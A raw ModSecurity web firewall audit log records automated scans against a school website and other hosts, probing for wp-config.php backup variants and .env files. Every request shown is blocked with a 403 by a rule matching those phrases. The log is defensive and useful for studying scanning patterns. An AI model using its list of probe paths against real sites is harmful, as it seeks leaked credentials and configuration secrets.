Stopwatch2: 1745015852475148 782; combined=345, p1=310, p2=0, p3=0, p4=0, p5=34, sr=131, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6abcc05c-Z--
--40a72670-A--
[19/Apr/2025:07:38:30 +0700] aALwhkruoUXZj665VUF9CAAAAMI 103.236.140.4 41298 103.236.140.4 8181
--40a72670-B--
GET /wp-config.php.web HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 109.70.100.70
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 109.70.100.70
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
--40a72670-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--40a72670-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745023110790605 898 (- - -)
Stopwatch2: 1745023110790605 898; combined=359, p1=322, p2=0, p3=0, p4=0, p5=37, sr=120, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--40a72670-Z--
--db74bf33-A--
[19/Apr/2025:07:38:31 +0700] aALwh-vDiFC_ir7MDwaEhgAAAFY 103.236.140.4 41304 103.236.140.4 8181
--db74bf33-B--
GET /wp-config.php.sw HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 109.70.100.70
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 109.70.100.70
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
--db74bf33-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--db74bf33-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745023111672932 2522 (- - -)
Stopwatch2: 1745023111672932 2522; combined=644, p1=580, p2=0, p3=0, p4=0, p5=64, sr=125, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--db74bf33-Z--
--3dd3bd76-A--
[19/Apr/2025:07:38:32 +0700] aALwiA6cTFSgLAHl7PpbfwAAAA4 103.236.140.4 41310 103.236.140.4 8181
--3dd3bd76-B--
GET /wp-config.php.old.bk HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 45.84.107.182
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.84.107.182
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
--3dd3bd76-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3dd3bd76-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745023112565465 913 (- - -)
Stopwatch2: 1745023112565465 913; combined=343, p1=301, p2=0, p3=0, p4=0, p5=41, sr=76, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3dd3bd76-Z--
--76f14b25-A--
[19/Apr/2025:07:38:33 +0700] aALwievDiFC_ir7MDwaEiAAAAEI 103.236.140.4 41316 103.236.140.4 8181
--76f14b25-B--
GET /wp-config.php.. HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 45.84.107.182
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.84.107.182
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
--76f14b25-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--76f14b25-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745023113170188 837 (- - -)
Stopwatch2: 1745023113170188 837; combined=325, p1=290, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--76f14b25-Z--
--b69a1671-A--
[19/Apr/2025:07:38:33 +0700] aALwievDiFC_ir7MDwaEiQAAAEQ 103.236.140.4 41318 103.236.140.4 8181
--b69a1671-B--
GET /wp-config.php... HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 45.84.107.182
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.84.107.182
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
--b69a1671-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b69a1671-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745023113812527 664 (- - -)
Stopwatch2: 1745023113812527 664; combined=252, p1=221, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b69a1671-Z--
--818a4f66-A--
[19/Apr/2025:07:38:34 +0700] aALwig6cTFSgLAHl7PpbgQAAAAo 103.236.140.4 41324 103.236.140.4 8181
--818a4f66-B--
GET /wp-config.php.old.backup HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 45.84.107.54
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.84.107.54
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
--818a4f66-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--818a4f66-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745023114479477 961 (- - -)
Stopwatch2: 1745023114479477 961; combined=409, p1=352, p2=0, p3=0, p4=0, p5=56, sr=128, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--818a4f66-Z--
--91cf5d17-A--
[19/Apr/2025:07:38:35 +0700] aALwi-vDiFC_ir7MDwaEiwAAAFc 103.236.140.4 41326 103.236.140.4 8181
--91cf5d17-B--
GET /wp-config.php.antigo HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 185.40.4.101
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 185.40.4.101
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
--91cf5d17-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--91cf5d17-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745023115122738 704 (- - -)
Stopwatch2: 1745023115122738 704; combined=253, p1=221, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--91cf5d17-Z--
--aa31f70b-A--
[19/Apr/2025:07:38:35 +0700] aALwi-vDiFC_ir7MDwaEjQAAAEY 103.236.140.4 41332 103.236.140.4 8181
--aa31f70b-B--
GET /wp-config.php.oldd HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 185.40.4.101
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 185.40.4.101
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
--aa31f70b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--aa31f70b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745023115724619 854 (- - -)
Stopwatch2: 1745023115724619 854; combined=334, p1=296, p2=0, p3=0, p4=0, p5=37, sr=75, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--aa31f70b-Z--
--debd9477-A--
[19/Apr/2025:07:38:43 +0700] aALwk-vDiFC_ir7MDwaElgAAAFM 103.236.140.4 41366 103.236.140.4 8181
--debd9477-B--
GET /wp-config.php.new2021 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 185.40.4.101
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 185.40.4.101
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
--debd9477-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--debd9477-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745023123146927 851 (- - -)
Stopwatch2: 1745023123146927 851; combined=352, p1=315, p2=0, p3=0, p4=0, p5=37, sr=100, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--debd9477-Z--
--4bce0b1e-A--
[19/Apr/2025:07:38:43 +0700] aALwk-vDiFC_ir7MDwaEmAAAAEQ 103.236.140.4 41372 103.236.140.4 8181
--4bce0b1e-B--
GET /wp-config.php.new2022 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 185.40.4.101
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 185.40.4.101
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
--4bce0b1e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4bce0b1e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745023123790238 833 (- - -)
Stopwatch2: 1745023123790238 833; combined=325, p1=293, p2=0, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4bce0b1e-Z--
--4f9de019-A--
[19/Apr/2025:07:38:44 +0700] aALwlOvDiFC_ir7MDwaEmQAAAFg 103.236.140.4 41374 103.236.140.4 8181
--4f9de019-B--
GET /wp-config.php.new2023 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 185.40.4.101
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 185.40.4.101
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
--4f9de019-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4f9de019-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745023124408152 696 (- - -)
Stopwatch2: 1745023124408152 696; combined=288, p1=255, p2=0, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4f9de019-Z--
--d429cf27-A--
[19/Apr/2025:07:38:45 +0700] aALwlevDiFC_ir7MDwaEmwAAAEg 103.236.140.4 41380 103.236.140.4 8181
--d429cf27-B--
GET /wp-config.php.new2024 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 185.40.4.101
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 185.40.4.101
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
--d429cf27-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d429cf27-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745023125009951 893 (- - -)
Stopwatch2: 1745023125009951 893; combined=400, p1=363, p2=0, p3=0, p4=0, p5=37, sr=148, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d429cf27-Z--
--788c1a0a-A--
[19/Apr/2025:07:38:45 +0700] aALwlXNa4dA2HllpK_MT3wAAAJg 103.236.140.4 41382 103.236.140.4 8181
--788c1a0a-B--
GET /wp-config.php.new2025 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 185.40.4.101
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 185.40.4.101
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
--788c1a0a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--788c1a0a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745023125604756 13198 (- - -)
Stopwatch2: 1745023125604756 13198; combined=25148, p1=237, p2=0, p3=0, p4=0, p5=12470, sr=67, sw=0, l=0, gc=12441
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--788c1a0a-Z--
--d3bd1364-A--
[19/Apr/2025:07:40:30 +0700] aALw_g6cTFSgLAHl7PpbjwAAABI 103.236.140.4 41742 103.236.140.4 8181
--d3bd1364-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.151.123.58
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.151.123.58
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--d3bd1364-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d3bd1364-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745023230093565 784 (- - -)
Stopwatch2: 1745023230093565 784; combined=330, p1=293, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d3bd1364-Z--
--eeed7077-A--
[19/Apr/2025:07:40:31 +0700] aALw_0ruoUXZj665VUF9EQAAAM8 103.236.140.4 41750 103.236.140.4 8181
--eeed7077-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.151.123.58
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.151.123.58
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--eeed7077-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--eeed7077-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745023231098561 654 (- - -)
Stopwatch2: 1745023231098561 654; combined=277, p1=240, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--eeed7077-Z--
--2d64e630-A--
[19/Apr/2025:08:20:22 +0700] aAL6VkruoUXZj665VUF_CAAAAMA 103.236.140.4 50942 103.236.140.4 8181
--2d64e630-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.135.193.65
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.135.193.65
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36
Accept-Charset: utf-8
--2d64e630-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2d64e630-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745025622878149 788 (- - -)
Stopwatch2: 1745025622878149 788; combined=344, p1=304, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2d64e630-Z--
--0c0d6520-A--
[19/Apr/2025:09:22:11 +0700] aAMI00ruoUXZj665VUGB6QAAAM4 103.236.140.4 36808 103.236.140.4 8181
--0c0d6520-B--
GET /wp-config.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 139.59.245.198
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 139.59.245.198
X-Forwarded-Proto: http
Connection: close
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Accept: */*
--0c0d6520-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0c0d6520-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745029331775722 947 (- - -)
Stopwatch2: 1745029331775722 947; combined=376, p1=336, p2=0, p3=0, p4=0, p5=40, sr=116, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0c0d6520-Z--
--b9bf0369-A--
[19/Apr/2025:11:06:45 +0700] aAMhVUruoUXZj665VUGI5AAAANc 103.236.140.4 33420 103.236.140.4 8181
--b9bf0369-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 159.203.68.19
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 159.203.68.19
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--b9bf0369-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b9bf0369-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745035605686505 709 (- - -)
Stopwatch2: 1745035605686505 709; combined=313, p1=275, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b9bf0369-Z--
--43191243-A--
[19/Apr/2025:11:17:41 +0700] aAMj5Q6cTFSgLAHl7Ppq5AAAABM 103.236.140.4 35866 103.236.140.4 8181
--43191243-B--
GET /.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 107.150.0.116
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 107.150.0.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--43191243-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--43191243-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
